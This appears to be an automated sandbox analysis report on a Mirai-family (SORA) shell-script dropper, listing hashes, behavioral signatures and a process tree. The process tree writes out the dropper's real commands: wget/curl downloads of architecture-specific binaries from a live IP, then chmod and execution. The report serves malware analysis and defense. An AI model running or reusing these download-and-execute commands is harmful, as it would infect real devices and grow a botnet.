Analysis
max time kernel: 150s
max time network: 156s
platform: debian-9_mips
resource: debian9-mipsbe-20240611-en
resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 03-11-2024 14:37
Static task: static1
Behavioral task: behavioral1
  Sample: aws.sh
  Resource: ubuntu1804-amd64-20240729-en
Behavioral task: behavioral2
  Sample: aws.sh
  Resource: debian9-armhf-20240418-en
Behavioral task: behavioral3
  Sample: aws.sh
  Resource: debian9-mipsbe-20240611-en
General
Target: aws.sh
Size: 2KB
MD5: b9ea41c0744886c9aa436d2560a56f9d
SHA1: eab007c33f66384f237c3385f56ad11522778fcd
SHA256: 03f69bcb2f4e202c7372cf932d65338255201439fe776cd8ac8a9632065555bf
SHA512: 767eafb58db47b959fa25019f2ecb7bc93d983e84fee08303918b36b9c0034b2675dd6751b66dcf990a80018ae48c25c5789502b385e668cc2b6f96d2dd41889
Malware Config
Extracted
mirai
SORA
Signatures
- Mirai family
- Contacts a large (34714) amount of remote hosts (1 TTPs)
  This may indicate a network scan to discover remotely running services.
- Creates a large amount of network flows (1 TTPs)
  This may indicate a network scan to discover remotely running services.
- File and Directory Permissions Modification (1 TTPs, 12 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid   Process
  752   chmod
  786   chmod
  806   chmod
  826   chmod
  836   chmod
  849   chmod
  877   chmod
  745   chmod
  763   chmod
  769   chmod
  842   chmod
  861   chmod
- Executes dropped EXE (12 IoCs)
  ioc           pid   Process
  /tmp/robben   746   robben
  /tmp/robben   753   robben
  /tmp/robben   764   robben
  /tmp/robben   770   robben
  /tmp/robben   787   robben
  /tmp/robben   807   robben
  /tmp/robben   827   robben
  /tmp/robben   837   robben
  /tmp/robben   843   robben
  /tmp/robben   850   robben
  /tmp/robben   863   robben
  /tmp/robben   878   robben
- Modifies Watchdog functionality (1 TTPs, 2 IoCs)
  Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
  description                    ioc                  Process
  File opened for modification   /dev/watchdog        robben
  File opened for modification   /dev/misc/watchdog   robben
- resource                          yara_rule
  behavioral3/files/fstream-1.dat   upx
  behavioral3/files/fstream-4.dat   upx
  behavioral3/files/fstream-5.dat   upx
  behavioral3/files/fstream-7.dat   upx
- Changes its process name (1 IoCs)
  description                                                       ioc                  pid   Process
  Changes the process name, possibly in an attempt to hide itself   pdpmgk1kica034ncie   753   robben
- Reads runtime system information
  description               ioc                             Process
  File opened for reading   /proc/873/exe                   robben
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/795/exe                   robben
  File opened for reading   /proc/834/exe                   robben
  File opened for reading   /proc/508/exe                   robben
  File opened for reading   /proc/814/exe                   robben
  File opened for reading   /proc/824/exe                   robben
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/827/exe                   robben
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/719/exe                   robben
  File opened for reading   /proc/742/exe                   robben
  File opened for reading   /proc/761/exe                   robben
  File opened for reading   /proc/480/exe                   robben
  File opened for reading   /proc/510/exe                   robben
  File opened for reading   /proc/840/exe                   robben
  File opened for reading   /proc/859/exe                   robben
  File opened for reading   /proc/711/exe                   robben
  File opened for reading   /proc/819/exe                   robben
  File opened for reading   /proc/837/exe                   robben
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/870/exe                   robben
  File opened for reading   /proc/710/exe                   robben
  File opened for reading   /proc/800/exe                   robben
  File opened for reading   /proc/846/exe                   robben
  File opened for reading   /proc/853/exe                   robben
  File opened for reading   /proc/866/exe                   robben
  File opened for reading   /proc/716/exe                   robben
  File opened for reading   /proc/789/exe                   robben
  File opened for reading   /proc/831/exe                   robben
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/791/exe                   robben
  File opened for reading   /proc/845/exe                   robben
  File opened for reading   /proc/473/exe                   robben
  File opened for reading   /proc/714/exe                   robben
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/855/exe                   robben
  File opened for reading   /proc/754/exe                   robben
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/852/exe                   robben
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/757/exe                   robben
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/847/exe                   robben
  File opened for reading   /proc/691/exe                   robben
  File opened for reading   /proc/706/exe                   robben
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/408/exe                   robben
  File opened for reading   /proc/815/exe                   robben
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/868/exe                   robben
  File opened for reading   /proc/712/exe                   robben
- System Network Configuration Discovery (1 TTPs, 3 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid   Process
  750   curl
  751   cat
  748   wget
- Writes file to tmp directory (22 IoCs)
  Malware often drops required files in the /tmp directory.
  description                    ioc                  Process
  File opened for modification   /tmp/sora.mips       wget
  File opened for modification   /tmp/sora.mips       curl
  File opened for modification   /tmp/sora.x86_64     wget
  File opened for modification   /tmp/sora.arm6       curl
  File opened for modification   /tmp/sora.i686       curl
  File opened for modification   /tmp/sora.arm4       curl
  File opened for modification   /tmp/sora.arm5       wget
  File opened for modification   /tmp/sora.arm7       wget
  File opened for modification   /tmp/sora.x86        wget
  File opened for modification   /tmp/sora.x86        curl
  File opened for modification   /tmp/sora.x86_64     curl
  File opened for modification   /tmp/sora.i686       wget
  File opened for modification   /tmp/sora.ppc        wget
  File opened for modification   /tmp/sora.ppc        curl
  File opened for modification   /tmp/sora.mpsl       curl
  File opened for modification   /tmp/sora.arm7       curl
  File opened for modification   /tmp/sora.ppc440fp   curl
  File opened for modification   /tmp/sora.arm6       wget
  File opened for modification   /tmp/robben          aws.sh
  File opened for modification   /tmp/sora.i468       curl
  File opened for modification   /tmp/sora.mpsl       wget
  File opened for modification   /tmp/sora.arm5       curl
Processes (child processes are indented under their parent; signatures hit by each process are listed beneath it)

PID       Path            Command line
PID 714   /tmp/aws.sh     /tmp/aws.sh
  - Writes file to tmp directory
  PID 720   /usr/bin/wget   wget http://93.123.85.190/bins/sora.x86
    - Writes file to tmp directory
  PID 732   /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.x86
    - Reads runtime system information
    - Writes file to tmp directory
  PID 744   /bin/cat        cat sora.x86
  PID 745   /bin/chmod      chmod +x aws.sh robben sora.x86
    - File and Directory Permissions Modification
  PID 746   /tmp/robben     ./robben aws.exploit
    - Executes dropped EXE
  PID 748   /usr/bin/wget   wget http://93.123.85.190/bins/sora.mips
    - System Network Configuration Discovery
    - Writes file to tmp directory
  PID 750   /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.mips
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  PID 751   /bin/cat        cat sora.mips
    - System Network Configuration Discovery
  PID 752   /bin/chmod      chmod +x aws.sh robben sora.mips sora.x86
    - File and Directory Permissions Modification
  PID 753   /tmp/robben     ./robben aws.exploit
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Changes its process name
    - Reads runtime system information
  PID 760   /usr/bin/wget   wget http://93.123.85.190/bins/sora.x86_64
    - Writes file to tmp directory
  PID 761   /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.x86_64
    - Reads runtime system information
    - Writes file to tmp directory
  PID 762   /bin/cat        cat sora.x86_64
  PID 763   /bin/chmod      chmod +x aws.sh robben sora.mips sora.x86 sora.x86_64
    - File and Directory Permissions Modification
  PID 764   /tmp/robben     ./robben aws.exploit
    - Executes dropped EXE
  PID 766   /usr/bin/wget   wget http://93.123.85.190/bins/sora.i468
  PID 767   /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.i468
    - Reads runtime system information
    - Writes file to tmp directory
  PID 768   /bin/cat        cat sora.i468
  PID 769   /bin/chmod      chmod +x aws.sh robben sora.i468 sora.mips sora.x86 sora.x86_64
    - File and Directory Permissions Modification
  PID 770   /tmp/robben     ./robben aws.exploit
    - Executes dropped EXE
  PID 771   /usr/bin/wget   wget http://93.123.85.190/bins/sora.i686
    - Writes file to tmp directory
  PID 776   /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.i686
    - Reads runtime system information
    - Writes file to tmp directory
  PID 784   /bin/cat        cat sora.i686
  PID 786   /bin/chmod      chmod +x aws.sh robben sora.i468 sora.i686 sora.mips sora.x86 sora.x86_64
    - File and Directory Permissions Modification
  PID 787   /tmp/robben     ./robben aws.exploit
    - Executes dropped EXE
  PID 789   /usr/bin/wget   wget http://93.123.85.190/bins/sora.mpsl
    - Writes file to tmp directory
  PID 795   /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.mpsl
    - Reads runtime system information
    - Writes file to tmp directory
  PID 804   /bin/cat        cat sora.mpsl
  PID 806   /bin/chmod      chmod +x aws.sh robben sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64
    - File and Directory Permissions Modification
  PID 807   /tmp/robben     ./robben aws.exploit
    - Executes dropped EXE
  PID 809   /usr/bin/wget   wget http://93.123.85.190/bins/sora.arm4
  PID 814   /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.arm4
    - Reads runtime system information
    - Writes file to tmp directory
  PID 825   /bin/cat        cat sora.arm4
  PID 826   /bin/chmod      chmod +x aws.sh robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64
    - File and Directory Permissions Modification
  PID 827   /tmp/robben     ./robben aws.exploit
    - Executes dropped EXE
  PID 829   /usr/bin/wget   wget http://93.123.85.190/bins/sora.arm5
    - Writes file to tmp directory
  PID 834   /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.arm5
    - Reads runtime system information
    - Writes file to tmp directory
  PID 835   /bin/cat        cat sora.arm5
  PID 836   /bin/chmod      chmod +x aws.sh robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64
    - File and Directory Permissions Modification
  PID 837   /tmp/robben     ./robben aws.exploit
    - Executes dropped EXE
  PID 839   /usr/bin/wget   wget http://93.123.85.190/bins/sora.arm6
    - Writes file to tmp directory
  PID 840   /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.arm6
    - Reads runtime system information
    - Writes file to tmp directory
  PID 841   /bin/cat        cat sora.arm6
  PID 842   /bin/chmod      chmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64
    - File and Directory Permissions Modification
  PID 843   /tmp/robben     ./robben aws.exploit
    - Executes dropped EXE
  PID 846   /usr/bin/wget   wget http://93.123.85.190/bins/sora.arm7
    - Writes file to tmp directory
  PID 847   /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.arm7
    - Reads runtime system information
    - Writes file to tmp directory
  PID 848   /bin/cat        cat sora.arm7
  PID 849   /bin/chmod      chmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_64
    - File and Directory Permissions Modification
  PID 850   /tmp/robben     ./robben aws.exploit
    - Executes dropped EXE
  PID 852   /usr/bin/wget   wget http://93.123.85.190/bins/sora.ppc
    - Writes file to tmp directory
  PID 853   /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.ppc
    - Reads runtime system information
    - Writes file to tmp directory
  PID 860   /bin/cat        cat sora.ppc
  PID 861   /bin/chmod      chmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.x86 sora.x86_64
    - File and Directory Permissions Modification
  PID 863   /tmp/robben     ./robben aws.exploit
    - Executes dropped EXE
  PID 866   /usr/bin/wget   wget http://93.123.85.190/bins/sora.ppc440fp
  PID 870   /usr/bin/curl   curl -O http://93.123.85.190/bins/sora.ppc440fp
    - Reads runtime system information
    - Writes file to tmp directory
  PID 876   /bin/cat        cat sora.ppc440fp
  PID 877   /bin/chmod      chmod +x aws.sh robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.x86 sora.x86_64
    - File and Directory Permissions Modification
  PID 878   /tmp/robben     ./robben aws.exploit
    - Executes dropped EXE
  PID 881   /usr/bin/wget   wget http://93.123.85.190/bins/sora.m68k
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 28KB
  MD5: fa5457b7546c1b7060c30bde3f8649ca
  SHA1: 7c75f6463c36eaebc4719f47d8047e5195a85057
  SHA256: d3f2f30efffec0f49e28199c60b2819a3e831ae0ba920abd2c5ece5e4bfb3adf
  SHA512: f012d61a479015af70447b1c3bd2a48c2977691f9a180f4f5c3340b034c65d69782299cb8459e92e3a18dcadfa3078c8b1c613593170f9fa95dd53ba36050c21
- Filesize: 28KB
  MD5: ec332610b0ca5b634c097ed14f42eedc
  SHA1: abcbd111601f4165c400e9db36fbf20339e37170
  SHA256: 2bfdc588e26d5f6ac54ca3330ced3ab2bfc9bafb98cdd91fd017180dd5848b3a
  SHA512: f41f54e2aca4a5dfa3d7bcbad45963aa943fa3b6536c34f7c92c7c79894f1009ef5ab13cfed39b74ffc614791b77497689bcbe71edfefecb20497d873c92d1b0
- Filesize: 212B
  MD5: 83ab6cd9a67528bbc6f4f360cb7f8d83
  SHA1: 07e8f17209e0569aab39f062568ff0090d9b20d4
  SHA256: 3ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435
  SHA512: 171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f
- Filesize: 28KB
  MD5: d356657b6ea7a715b60217a914eb6ca8
  SHA1: b276b1a91895c3025e9f9d64227205dac79c8ef6
  SHA256: b0758e5e7fde30404ec43dd5fba21253735464062e8a10f0876193d18194fe22
  SHA512: 3b0ab5d1282c9d2ea18ed0fc78aeabafde6c16fa094d53d39a67d3316482da0cffa444dd5dc14aeefb547ce2f789480caa5bb514cb4a26787c7441ba8862e262
- Filesize: 51KB
  MD5: b8cb140290d21f49dd081f126a75b203
  SHA1: a9735bd0e2dc30f9bf9f41f01f09ef34be2be2cc
  SHA256: bce1fe24bc80d79c339fa6ef973ac73338716051739b0c26a72c31f33a5e6029
  SHA512: 003309e15087befbc4bde345a9d02b0974f4cbe835275fce367ba000867f1d515cc7c41298a5c8c9321525039fbcc5e29206f28448607c9c3b5325333faa706e
- Filesize: 27KB
  MD5: 00eff503439515d9b12b9c068367cb80
  SHA1: 82d68f2b1ffca8558458c1b858599542a67d8bbf
  SHA256: 2962b987b00b166299f9a73f7ccb8dc02b4208266465b41f6b1c9c28277d7276
  SHA512: 3800bc5a8f3983fc50813c49c906203af6528ff3eb97b4818a8632085562c25eab1c691edb5dcdc96c8d2c3f25784a41897ec8a52c042d391899a310224d50f5